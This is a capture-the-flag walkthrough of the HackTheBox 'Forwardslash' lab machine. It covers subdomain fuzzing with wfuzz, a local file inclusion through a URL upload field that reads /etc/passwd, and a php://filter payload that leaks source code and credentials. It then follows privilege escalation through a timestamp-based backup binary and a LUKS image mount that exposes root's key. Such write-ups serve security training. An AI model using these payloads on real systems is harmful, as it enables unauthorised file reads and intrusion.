HacktheBox Forwardslash Write-up
We would be exploiting the forwardslash box from hackthebox. The box comprises of some enumeration for subdomain and then we would exploit it by Local File Inclusion vulnerability and then by getting shell we would go for post exploitation to gain the root shell.
Enumeration
By using nmapAutomator for enumeration.
cmd = “./nampautomator 10.10.10.183 All”
Nmap scan report for 10.10.10.183
Host is up (0.25s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3c:3b:eb:54:96:81:1d:da:d7:96:c7:0f:b4:7e:e1:cf (RSA)
| 256 f6:b3:5f:a2:59:e3:1e:57:35:36:c3:fe:5e:3d:1f:66 (ECDSA)
|_ 256 1b:de:b8:07:35:e8:18:2c:19:d8:cc:dd:77:9c:f2:5e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://forwardslash.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds
There are 2 ports open 22 and 80. Before going for exploitation lets get some overview of the ports. The 22 port is used for SSH connection which is of OpenSSH version 7.6p1. The 80 port is much familiar as it is used for hosting a web server.
After running some common enumeration tools such as “nikto”, “gobuster”, “dirbuster”. But didn’t got any lead. So, I went for subdomain enumeration by running “ wfuzz”.
cmd = “wfuzz — hh 0 -H ‘Host: FUZZ.forwardslash.htb’ -u http://10.10.10.183/ — hc 400 -w /usr/share/word-lists/wfuzz/general/common.txt -c”
–hh = for hiding the result which has
–hc = for hiding result which have response 400
-c = for making the result
After getting a new subdomain add it to /etc/hosts file “backup.forwardslash.htb”. Now enumerating the new domain we get a login page.
By signing in as a new user we could get the dashboard. After observing the functionality we saw that we could upload an image by url. It gave me a strike of LFI (Local File Inclusion) vulnerability. But we need to enable the tabs for entering the data into the url text box and also enable the submit button.
Trying with some common payloads extracting the “file:///etc/passwd” .
As enumerating the directories we saw /dev/ directory. But we got permission denied while extracting the content from the file.
Exploitation
Now we could exploit the vulnerability by including PHP file through PHP wrapper . You can read about it from “PayloadAllThings.”
payload = “php://filter/convert.base64-encode/resource=file:///var/www/backup.forwardslash.htb/dev/index.php”
We get the index.PHP file in base64 encoded. After decoding the data we get the credentials of FTP login. But since there is no Ftp-port open lets try logging into SSH.
cmd = ssh chiv@10.10.10.183
After getting the shell lets execute the LinuxPrivEsc commands and scripts for post-exploitation. After running the LinEnum script and looking to the results found a SUID binary owned by pain user and one more interesting thing there is a file called config.PHP.bak which is also owned by user pain. But don’t have permission to r/w/x.
After observing the output of backup file we got to know that it is generating different hash every time. Observing the text in the output as it says “time based backup viewer” it maybe the md5sum that is being generated it’s of the current timestamp including seconds that's why its changing whenever you run it again. Here i made a bash script just for checking the md5 value if it will be the same.
This will create a timestamp of the current time and convert it to md5 . And then it will link the config.PHP.bak file with the time variable and then run the backup binary.This will show us the content of the config.PHP.bak file.
Great we got the password of pain user. Now lets move on to post exploitation.
Post Exploitation
Firstly lets see what all are our rights and could perform as a root.
Cryptsetup is used to map the images generally of a backup images.And then we can mount the mapped images to any directory and access the files in it.
As we saw that there is encryptorinator directory which encrypts the cipher text given . After analyzing the code i made some changes in it , are here. To look for common words in the decrypted message and if we have then that’s our key to get the message.
After running the decrypt.py file it gave me the key and the password.
Now we could map the image in /var/backups/recovery. Entering the password “cB!6%sdH8Lj^@Y*$C2cf”
cmd = sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup
After checking into /dev/mapper for the mapped images. Now that it has been created we can mount the images into the /mnt directory.That gives us the private key for the root.
Let’s login as root and fetch the root.txt file.
